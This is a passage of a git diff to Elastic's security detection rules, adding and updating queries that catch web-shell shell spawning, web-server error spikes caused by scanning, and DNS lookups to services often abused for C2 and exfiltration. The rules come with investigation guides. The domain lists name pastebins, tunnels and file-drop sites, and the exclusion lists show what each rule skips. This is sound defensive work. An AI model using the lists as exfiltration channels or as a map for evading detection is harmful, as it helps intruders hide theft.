host.os.type:linux and event.type:start and event.action:exec and (\n process.parent.name:(\n \"apache\" or \"nginx\" or \"apache2\" or \"httpd\" or \"lighttpd\" or \"caddy\" or \"mongrel_rails\" or \"haproxy\" or\n \"gunicorn\" or \"uwsgi\" or \"openresty\" or \"cherokee\" or \"h2o\" or \"resin\" or \"puma\" or \"unicorn\" or \"traefik\" or \"uvicorn\" or\n \"tornado\" or \"hypercorn\" or \"daphne\" or \"twistd\" or \"yaws\" or \"webfsd\" or \"httpd.worker\" or \"flask\" or \"rails\" or \"mongrel\" or\n php* or ruby* or perl* or python* or \"node\" or \"java\"\n ) or\n user.name:(\"apache\" or \"www-data\" or \"httpd\" or \"nginx\" or \"lighttpd\" or \"tomcat\" or \"tomcat8\" or \"tomcat9\") or\n user.id:(\"33\" or \"498\" or \"48\" or \"54321\")\n) and process.working_directory:(\n /var/www/* or\n /usr/share/nginx/* or\n /srv/www/* or\n /srv/http/* or\n */webapps/* or\n /home/*/public_html/* or\n /home/*/www/* or\n /opt/* or\n /u0*/*\n) and\nprocess.command_line:* and process.name:(bash or dash or sh or tcsh or csh or zsh or ksh or fish) and process.args:\"-c\" and\nnot (\n (process.parent.name:java and not process.parent.executable:/u0*/*) or\n (process.parent.name:python* and process.parent.executable:(/bin/python* or /usr/bin/python* or /usr/local/bin/python* or /tmp/*python* or /opt/oracle.ahf/python/*)) or\n (process.parent.name:ruby* and process.parent.executable:(/bin/ruby* or /usr/bin/ruby* or /usr/local/bin/ruby* or /tmp/*ruby* or /bin/ruby or /usr/bin/ruby or /usr/local/bin/ruby)) or\n (process.parent.name:perl* and process.parent.executable:(/bin/perl* or /usr/bin/perl* or /usr/local/bin/perl* or /tmp/*perl* or /bin/perl or /usr/bin/perl or /usr/local/bin/perl)) or\n (process.parent.name:php* and process.parent.executable:(/bin/php* or /usr/bin/php* or /usr/local/bin/php* or /tmp/*php* or /bin/php or /usr/bin/php or /usr/local/bin/php)) or\n (process.parent.name:node and process.parent.executable:(/home/*/.vscode-server/* or /users/*/.vscode-server/* or /bin/node or /usr/bin/node or /usr/local/bin/node or /opt/plesk/node/*/bin/node)) or\n process.working_directory:(/u0*/*/sysman/emd or /u0*/app/oracle/product/*/dbhome_* or /u0*/app/oracle/product/*/db_* or /var/www/*edoc*) or\n process.parent.executable:/tmp/* or\n process.args:/usr/local/bin/wkhtmltopdf*\n)\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^9.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.working_directory", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "65f28c4d-cfc8-4847-9cca-f2fb1e319151", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "Domain: Web", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Defend", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1505", + "name": "Server Software Component", + "reference": "https://attack.mitre.org/techniques/T1505/", + "subtechnique": [ + { + "id": "T1505.003", + "name": "Web Shell", + "reference": "https://attack.mitre.org/techniques/T1505/003/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.004", + "name": "Unix Shell", + "reference": "https://attack.mitre.org/techniques/T1059/004/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1071", + "name": "Application Layer Protocol", + "reference": "https://attack.mitre.org/techniques/T1071/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 1 + }, + "id": "65f28c4d-cfc8-4847-9cca-f2fb1e319151_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/6631a759-4559-4c33-a392-13f146c8bcc4_2.json b/packages/security_detection_engine/kibana/security_rule/6631a759-4559-4c33-a392-13f146c8bcc4_2.json new file mode 100644 index 00000000000..cc81e6659ea --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/6631a759-4559-4c33-a392-13f146c8bcc4_2.json @@ -0,0 +1,117 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule detects unusual spikes in error logs from web servers, which may indicate reconnaissance activities such as vulnerability scanning or fuzzing attempts by adversaries. These activities often generate a high volume of error responses as they probe for weaknesses in web applications. Error response codes may potentially indicate server-side issues that could be exploited.", + "from": "now-11m", + "interval": "10m", + "language": "esql", + "license": "Elastic License v2", + "name": "Potential Spike in Web Server Error Logs", + "note": " ## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Potential Spike in Web Server Error Logs\n\nThis detection flags spikes of web server error responses across HTTP/TLS and common server platforms, signaling active scanning or fuzzing that can expose misconfigurations or exploitable paths. A typical pattern is an automated scanner sweeping endpoints like /admin/, /debug/, /.env, /.git, and backup archives while mutating query parameters, producing repeated 404/403 and occasional 500 responses across multiple applications within minutes.\n\n### Possible investigation steps\n\n- Pivot on the noisy client IP(s) to build a minute-by-minute timeline across affected hosts showing request rate, status codes, methods, and top paths to distinguish automated scanning from a localized application failure.\n- Enrich the client with ASN, geolocation, hosting/Tor/proxy reputation, historical sightings, and maintenance windows to quickly decide if it matches a known external scanner or an internal scheduled test.\n- Aggregate the most requested URIs and verbs and look for telltale patterns such as /.env, /.git, backup archives, admin consoles, or unusual verbs like PROPFIND/TRACE, then correlate any 5xx bursts with application and server error logs and recent deploys or config changes.\n- Hunt for follow-on success from the same client by checking for subsequent 200/302s to sensitive paths, authentication events and session creation, or evidence of file writes and suspicious child processes on the web hosts.\n- If traffic traverses a CDN/WAF/load balancer, pivot to those logs to recover true client IPs, review rule matches and throttling, and determine whether similar patterns occurred across multiple edges or regions.\n\n### False positive analysis\n\n- Internal QA or integration tests that systematically crawl application routes after a deployment can generate bursts of 404/403 and occasional 500s from a single client IP, closely resembling active scanning.\n- A transient backend outage or misconfiguration (broken asset paths or auth flows) can cause legitimate traffic to return many errors aggregated under a shared egress IP (NAT), pushing per-IP counts above the threshold without adversary activity.\n\n### Response and remediation\n\n- Immediately block or throttle the noisy client IPs at the WAF/CDN and load balancer by enabling per-IP rate limits and signatures for scanner patterns such as repeated hits to /.env, /.git, /admin, backup archives, or unusual verbs like PROPFIND/TRACE.\n- If errors include concentrated 5xx responses from one web host, drain that node from service behind the load balancer, capture its web and application error logs, and roll back the most recent deploy or config change until error rates normalize.\n- Remove risky exposures uncovered by the scan by denying access to environment files and VCS directories (.env, .git), disabling directory listing, locking down admin consoles, and rejecting unsupported HTTP methods at the web server.\n- Escalate to Incident Response if the same client shifts from errors to successful access on sensitive endpoints (200/302 to /admin, /login, or API keys), if you observe file writes under the webroot or suspicious child processes, or if multiple unrelated clients show the same pattern across regions.\n- Recover service by redeploying known-good builds, re-enabling health checks, running smoke tests against top routes, and restoring normal WAF/CDN policies while keeping a temporary blocklist for the offending IPs.\n- Harden long term by tuning WAF/CDN to auto-throttle bursty 404/403/500 patterns, disabling TRACE/OPTIONS where unused, minimizing verbose error pages, and ensuring logs capture the true client IP via X-Forwarded-For or True-Client-IP headers.\n", + "query": "from logs-nginx.error-*, logs-apache_tomcat.error-*, logs-apache.error-*, logs-iis.error-*\n| keep\n @timestamp,\n event.type,\n event.dataset,\n source.ip,\n agent.id,\n host.name,\n data_stream.namespace\n\n| where source.ip is not null\n| stats\n Esql.event_count = count(),\n Esql.host_name_values = values(host.name),\n Esql.agent_id_values = values(agent.id),\n Esql.event_dataset_values = values(event.dataset),\n Esql.data_stream_namespace_values = values(data_stream.namespace)\n by source.ip, agent.id\n| where\n Esql.event_count > 50\n", + "related_integrations": [ + { + "package": "nginx", + "version": "^2.0.0" + }, + { + "package": "apache", + "version": "^2.0.0" + }, + { + "package": "apache_tomcat", + "version": "^1.9.0" + }, + { + "package": "iis", + "version": "^1.21.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "Esql.agent_id_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.data_stream_namespace_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.event_count", + "type": "long" + }, + { + "ecs": false, + "name": "Esql.event_dataset_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.host_name_values", + "type": "keyword" + }, + { + "ecs": true, + "name": "agent.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "source.ip", + "type": "ip" + } + ], + "risk_score": 21, + "rule_id": "6631a759-4559-4c33-a392-13f146c8bcc4", + "severity": "low", + "tags": [ + "Domain: Web", + "Use Case: Threat Detection", + "Tactic: Reconnaissance", + "Data Source: Nginx", + "Data Source: Apache", + "Data Source: Apache Tomcat", + "Data Source: IIS", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0043", + "name": "Reconnaissance", + "reference": "https://attack.mitre.org/tactics/TA0043/" + }, + "technique": [ + { + "id": "T1595", + "name": "Active Scanning", + "reference": "https://attack.mitre.org/techniques/T1595/", + "subtechnique": [ + { + "id": "T1595.002", + "name": "Vulnerability Scanning", + "reference": "https://attack.mitre.org/techniques/T1595/002/" + }, + { + "id": "T1595.003", + "name": "Wordlist Scanning", + "reference": "https://attack.mitre.org/techniques/T1595/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "esql", + "version": 2 + }, + "id": "6631a759-4559-4c33-a392-13f146c8bcc4_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/66883649-f908-4a5b-a1e0-54090a1d3a32_120.json b/packages/security_detection_engine/kibana/security_rule/66883649-f908-4a5b-a1e0-54090a1d3a32_124.json similarity index 56% rename from packages/security_detection_engine/kibana/security_rule/66883649-f908-4a5b-a1e0-54090a1d3a32_120.json rename to packages/security_detection_engine/kibana/security_rule/66883649-f908-4a5b-a1e0-54090a1d3a32_124.json index f66049ed3b9..dc0504c30ea 100644 --- a/packages/security_detection_engine/kibana/security_rule/66883649-f908-4a5b-a1e0-54090a1d3a32_120.json +++ b/packages/security_detection_engine/kibana/security_rule/66883649-f908-4a5b-a1e0-54090a1d3a32_124.json @@ -6,13 +6,14 @@ "description": "Adversaries may implement command and control (C2) communications that use common web services to hide their activity. This attack technique is typically targeted at an organization and uses web services common to the victim network, which allows the adversary to blend into legitimate traffic activity. These popular services are typically targeted since they have most likely been used before compromise, which helps malicious traffic blend in.", "from": "now-9m", "index": [ - "logs-endpoint.events.network-*" + "logs-endpoint.events.network-*", + "logs-sentinel_one_cloud_funnel.*" ], "language": "eql", "license": "Elastic License v2", "name": "Connection to Commonly Abused Web Services", "note": "## Triage and analysis\n\n### Investigating Connection to Commonly Abused Web Services\n\nAdversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise.\n\nThis rule looks for processes outside known legitimate program locations communicating with a list of services that can be abused for exfiltration or command and control.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/current/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses the [Investigate Markdown Plugin](https://www.elastic.co/guide/en/security/current/interactive-investigation-guides.html) introduced in Elastic Stack version 8.8.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n - !{investigate{\"label\":\"Alerts associated with the user in the last 48h\",\"providers\":[[{\"excluded\":false,\"field\":\"event.kind\",\"queryType\":\"phrase\",\"value\":\"signal\",\"valueType\":\"string\"},{\"excluded\":false,\"field\":\"user.id\",\"queryType\":\"phrase\",\"value\":\"{{user.id}}\",\"valueType\":\"string\"}]],\"relativeFrom\":\"now-48h/h\",\"relativeTo\":\"now\"}}\n - !{investigate{\"label\":\"Alerts associated with the host in the last 48h\",\"providers\":[[{\"excluded\":false,\"field\":\"event.kind\",\"queryType\":\"phrase\",\"value\":\"signal\",\"valueType\":\"string\"},{\"excluded\":false,\"field\":\"host.name\",\"queryType\":\"phrase\",\"value\":\"{{host.name}}\",\"valueType\":\"string\"}]],\"relativeFrom\":\"now-48h/h\",\"relativeTo\":\"now\"}}\n- Verify whether the digital signature exists in the executable.\n- Identify the operation type (upload, download, tunneling, etc.).\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - !{investigate{\"label\":\"Investigate the Subject Process Network Events\",\"providers\":[[{\"excluded\":false,\"field\":\"event.category\",\"queryType\":\"phrase\",\"value\":\"network\",\"valueType\":\"string\"},{\"excluded\":false,\"field\":\"process.entity_id\",\"queryType\":\"phrase\",\"value\":\"{{process.entity_id}}\",\"valueType\":\"string\"}]]}}\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This rule has a high chance to produce false positives because it detects communication with legitimate services. Noisy false positives can be added as exceptions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", - "query": "network where host.os.type == \"windows\" and network.protocol == \"dns\" and\n process.name != null and user.id not in (\"S-1-5-18\", \"S-1-5-19\", \"S-1-5-20\") and\n /* Add new WebSvc domains here */\n dns.question.name :\n (\n \"raw.githubusercontent.*\",\n \"pastebin.*\",\n \"paste4btc.com\",\n \"paste.ee\",\n \"ghostbin.com\",\n \"drive.google.com\",\n \"?.docs.live.net\",\n \"api.dropboxapi.*\",\n \"content.dropboxapi.*\",\n \"dl.dropboxusercontent.*\",\n \"api.onedrive.com\",\n \"*.onedrive.org\",\n \"onedrive.live.com\",\n \"filebin.net\",\n \"*.ngrok.io\",\n \"ngrok.com\",\n \"*.portmap.*\",\n \"*serveo.net\",\n \"*localtunnel.me\",\n \"*pagekite.me\",\n \"*localxpose.io\",\n \"*notabug.org\",\n \"rawcdn.githack.*\",\n \"paste.nrecom.net\",\n \"zerobin.net\",\n \"controlc.com\",\n \"requestbin.net\",\n \"slack.com\",\n \"api.slack.com\",\n \"slack-redir.net\",\n \"slack-files.com\",\n \"cdn.discordapp.com\",\n \"discordapp.com\",\n \"discord.com\",\n \"apis.azureedge.net\",\n \"cdn.sql.gg\",\n \"?.top4top.io\",\n \"top4top.io\",\n \"www.uplooder.net\",\n \"*.cdnmegafiles.com\",\n \"transfer.sh\",\n \"gofile.io\",\n \"updates.peer2profit.com\",\n \"api.telegram.org\",\n \"t.me\",\n \"meacz.gq\",\n \"rwrd.org\",\n \"*.publicvm.com\",\n \"*.blogspot.com\",\n \"api.mylnikov.org\",\n \"file.io\",\n \"stackoverflow.com\",\n \"*files.1drv.com\",\n \"api.anonfile.com\",\n \"*hosting-profi.de\",\n \"ipbase.com\",\n \"ipfs.io\",\n \"*up.freeo*.space\",\n \"api.mylnikov.org\",\n \"script.google.com\",\n \"script.googleusercontent.com\",\n \"api.notion.com\",\n \"graph.microsoft.com\",\n \"*.sharepoint.com\",\n \"mbasic.facebook.com\",\n \"login.live.com\",\n \"api.gofile.io\",\n \"api.anonfiles.com\",\n \"api.notion.com\",\n \"api.trello.com\",\n \"gist.githubusercontent.com\",\n \"files.pythonhosted.org\",\n \"g.live.com\",\n \"*.zulipchat.com\",\n \"webhook.site\",\n \"run.mocky.io\",\n \"mockbin.org\", \n \"www.googleapis.com\", \n \"googleapis.com\",\n \"global.rel.tunnels.api.visualstudio.com\",\n \"*.devtunnels.ms\", \n \"api.github.com\") and\n \n /* Insert noisy false positives here */\n not (\n (\n process.executable : (\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\Windows\\\\system32\\\\svchost.exe\",\n \"?:\\\\Windows\\\\System32\\\\WWAHost.exe\",\n \"?:\\\\Windows\\\\System32\\\\smartscreen.exe\",\n \"?:\\\\Windows\\\\System32\\\\MicrosoftEdgeCP.exe\",\n \"?:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\*\\\\MsMpEng.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\BraveSoftware\\\\*\\\\Application\\\\brave.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Vivaldi\\\\Application\\\\vivaldi.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Programs\\\\Opera*\\\\opera.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Programs\\\\Fiddler\\\\Fiddler.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\OneDrive.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\PowerToys\\\\PowerToys.exe\",\n \"?:\\\\Windows\\\\system32\\\\mobsync.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\mobsync.exe\", \n \"?:\\\\Windows\\\\System32\\\\wsl.exe\", \n \"?:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\*\\\\MsMpEng.exe\"\n )\n ) or\n \n /* Discord App */\n (process.name : \"Discord.exe\" and (process.code_signature.subject_name : \"Discord Inc.\" and\n process.code_signature.trusted == true) and dns.question.name : (\"discord.com\", \"cdn.discordapp.com\", \"discordapp.com\")\n ) or \n\n /* MS Sharepoint */\n (process.name : \"Microsoft.SharePoint.exe\" and (process.code_signature.subject_name : \"Microsoft Corporation\" and\n process.code_signature.trusted == true) and dns.question.name : \"onedrive.live.com\"\n ) or \n\n /* Firefox */\n (process.name : \"firefox.exe\" and (process.code_signature.subject_name : \"Mozilla Corporation\" and\n process.code_signature.trusted == true)\n ) or \n\n /* Dropbox */\n (process.name : \"Dropbox.exe\" and (process.code_signature.subject_name : \"Dropbox, Inc\" and\n process.code_signature.trusted == true) and dns.question.name : (\"api.dropboxapi.com\", \"*.dropboxusercontent.com\")\n ) or \n\n /* Obsidian - Plugins are stored on raw.githubusercontent.com */\n (process.name : \"Obsidian.exe\" and (process.code_signature.subject_name : \"Dynalist Inc\" and\n process.code_signature.trusted == true) and dns.question.name : \"raw.githubusercontent.com\"\n ) or \n\n /* WebExperienceHostApp */\n (process.name : \"WebExperienceHostApp.exe\" and (process.code_signature.subject_name : \"Microsoft Windows\" and\n process.code_signature.trusted == true) and dns.question.name : (\"onedrive.live.com\", \"skyapi.onedrive.live.com\")\n ) or\n\n (process.code_signature.subject_name : \"Microsoft *\" and process.code_signature.trusted == true and\n dns.question.name : (\"*.sharepoint.com\", \"graph.microsoft.com\", \"g.live.com\", \"login.live.com\", \"login.live.com\")) or\n\n (process.code_signature.trusted == true and\n process.code_signature.subject_name :\n (\"Johannes Schindelin\",\n \"Redis Inc.\",\n \"Slack Technologies, LLC\",\n \"Cisco Systems, Inc.\",\n \"Dropbox, Inc\",\n \"Amazon.com Services LLC\", \n \"Island Technology Inc.\", \n \"GitHub, Inc.\", \n \"Red Hat, Inc\"))\n )\n", + "query": "network where host.os.type == \"windows\" and\n dns.question.name != null and process.name != null and\n not (?user.id in (\"S-1-5-18\", \"S-1-5-19\", \"S-1-5-20\") or user.domain == \"NT AUTHORITY\") and\n /* Add new WebSvc domains here */\n dns.question.name :\n (\n \"raw.githubusercontent.*\",\n \"pastebin.*\",\n \"paste4btc.com\",\n \"paste.ee\",\n \"ghostbin.com\",\n \"drive.google.com\",\n \"?.docs.live.net\",\n \"api.dropboxapi.*\",\n \"content.dropboxapi.*\",\n \"dl.dropboxusercontent.*\",\n \"api.onedrive.com\",\n \"*.onedrive.org\",\n \"onedrive.live.com\",\n \"filebin.net\",\n \"*.ngrok.io\",\n \"ngrok.com\",\n \"*.portmap.*\",\n \"*serveo.net\",\n \"*localtunnel.me\",\n \"*pagekite.me\",\n \"*localxpose.io\",\n \"*notabug.org\",\n \"rawcdn.githack.*\",\n \"paste.nrecom.net\",\n \"zerobin.net\",\n \"controlc.com\",\n \"requestbin.net\",\n \"slack.com\",\n \"api.slack.com\",\n \"slack-redir.net\",\n \"slack-files.com\",\n \"cdn.discordapp.com\",\n \"discordapp.com\",\n \"discord.com\",\n \"apis.azureedge.net\",\n \"cdn.sql.gg\",\n \"?.top4top.io\",\n \"top4top.io\",\n \"www.uplooder.net\",\n \"*.cdnmegafiles.com\",\n \"transfer.sh\",\n \"gofile.io\",\n \"updates.peer2profit.com\",\n \"api.telegram.org\",\n \"t.me\",\n \"meacz.gq\",\n \"rwrd.org\",\n \"*.publicvm.com\",\n \"*.blogspot.com\",\n \"api.mylnikov.org\",\n \"file.io\",\n \"stackoverflow.com\",\n \"*files.1drv.com\",\n \"api.anonfile.com\",\n \"*hosting-profi.de\",\n \"ipbase.com\",\n \"ipfs.io\",\n \"*up.freeo*.space\",\n \"api.mylnikov.org\",\n \"script.google.com\",\n \"script.googleusercontent.com\",\n \"api.notion.com\",\n \"graph.microsoft.com\",\n \"*.sharepoint.com\",\n \"mbasic.facebook.com\",\n \"login.live.com\",\n \"api.gofile.io\",\n \"api.anonfiles.com\",\n \"api.notion.com\",\n \"api.trello.com\",\n \"gist.githubusercontent.com\",\n \"files.pythonhosted.org\",\n \"g.live.com\",\n \"*.zulipchat.com\",\n \"webhook.site\",\n \"run.mocky.io\",\n \"mockbin.org\", \n \"www.googleapis.com\", \n \"googleapis.com\",\n \"global.rel.tunnels.api.visualstudio.com\",\n \"*.devtunnels.ms\", \n \"api.github.com\") and\n \n /* Insert noisy false positives here */\n not (\n (\n process.executable : (\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\*\\\\MsMpEng.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\BraveSoftware\\\\*\\\\Application\\\\brave.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\OneDrive.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Programs\\\\Opera*\\\\opera.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Programs\\\\Fiddler\\\\Fiddler.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\PowerToys\\\\PowerToys.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Vivaldi\\\\Application\\\\vivaldi.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Zen Browser\\\\zen.exe\",\n \"?:\\\\Users\\\\*\\\\Wavesor Software\\\\WaveBrowser\\\\wavebrowser.exe\",\n \"?:\\\\Windows\\\\System32\\\\MicrosoftEdgeCP.exe\",\n \"?:\\\\Windows\\\\system32\\\\mobsync.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\mobsync.exe\", \n \"?:\\\\Windows\\\\system32\\\\svchost.exe\",\n \"?:\\\\Windows\\\\System32\\\\smartscreen.exe\",\n \"?:\\\\Windows\\\\System32\\\\wsl.exe\", \n \"?:\\\\Windows\\\\System32\\\\WWAHost.exe\"\n )\n ) or\n \n /* Discord App */\n (process.name : \"Discord.exe\" and (process.code_signature.subject_name : \"Discord Inc.\" and\n process.code_signature.trusted == true) and dns.question.name : (\"discord.com\", \"cdn.discordapp.com\", \"discordapp.com\")\n ) or \n\n /* MS Sharepoint / OneDrive */\n (process.name : (\"Microsoft.SharePoint.exe\", \"OneDrive.Sync.Service.exe\") and dns.question.name : \"onedrive.live.com\" and\n (process.code_signature.subject_name : \"Microsoft Corporation\" and process.code_signature.trusted == true)\n ) or \n\n /* Obsidian - Plugins are stored on raw.githubusercontent.com */\n (process.name : \"Obsidian.exe\" and (process.code_signature.subject_name : \"Dynalist Inc\" and\n process.code_signature.trusted == true) and dns.question.name : \"raw.githubusercontent.com\"\n ) or \n\n /* WebExperienceHostApp */\n (process.name : \"WebExperienceHostApp.exe\" and (process.code_signature.subject_name : \"Microsoft Windows\" and\n process.code_signature.trusted == true) and dns.question.name : (\"onedrive.live.com\", \"skyapi.onedrive.live.com\")\n ) or\n\n /* IntelliJ IDEA connecting to raw.githubusercontent.com */\n (process.code_signature.subject_name : \"JetBrains s.r.o.\" and\n process.code_signature.trusted == true and dns.question.name : (\"api.github.com\", \"raw.githubusercontent.com\")\n ) or \n\n (process.code_signature.subject_name : \"Microsoft *\" and process.code_signature.trusted == true and\n dns.question.name : (\"*.sharepoint.com\", \"graph.microsoft.com\", \"g.live.com\", \"login.live.com\")\n ) or\n\n (process.code_signature.subject_name : (\"Python Software Foundation\", \"Anaconda, Inc.\") and\n process.code_signature.trusted == true and dns.question.name : \"files.pythonhosted.org\"\n ) or\n\n /* Zoom */\n (process.name : \"Zoom.exe\" and (process.code_signature.subject_name : \"Zoom Video Communications, Inc.\" and\n process.code_signature.trusted == true) and dns.question.name : (\"www.googleapis.com\", \"graph.microsoft.com\")\n ) or\n\n /* VSCode */\n (process.name : \"Code.exe\" and (process.code_signature.subject_name : \"Microsoft Corporation\" and\n process.code_signature.trusted == true) and dns.question.name : (\"api.github.com\", \"raw.githubusercontent.com\")\n ) or\n\n /* Terraform */\n (process.name : \"terraform-provider*.exe\" and (process.code_signature.subject_name : \"HashiCorp, Inc.\" and\n process.code_signature.trusted == true) and dns.question.name : \"graph.microsoft.com\"\n ) or\n\n (\n process.code_signature.trusted == true and\n process.code_signature.subject_name : (\n \"Johannes Schindelin\",\n \"Redis Inc.\",\n \"Slack Technologies, LLC\",\n \"Cisco Systems, Inc.\",\n \"Dropbox, Inc\",\n \"Amazon.com Services LLC\", \n \"Island Technology Inc.\", \n \"GitHub, Inc.\", \n \"Red Hat, Inc\",\n \"Mozilla Corporation\"\n )\n )\n )\n", "references": [ "https://www.elastic.co/security-labs/operation-bleeding-bear", 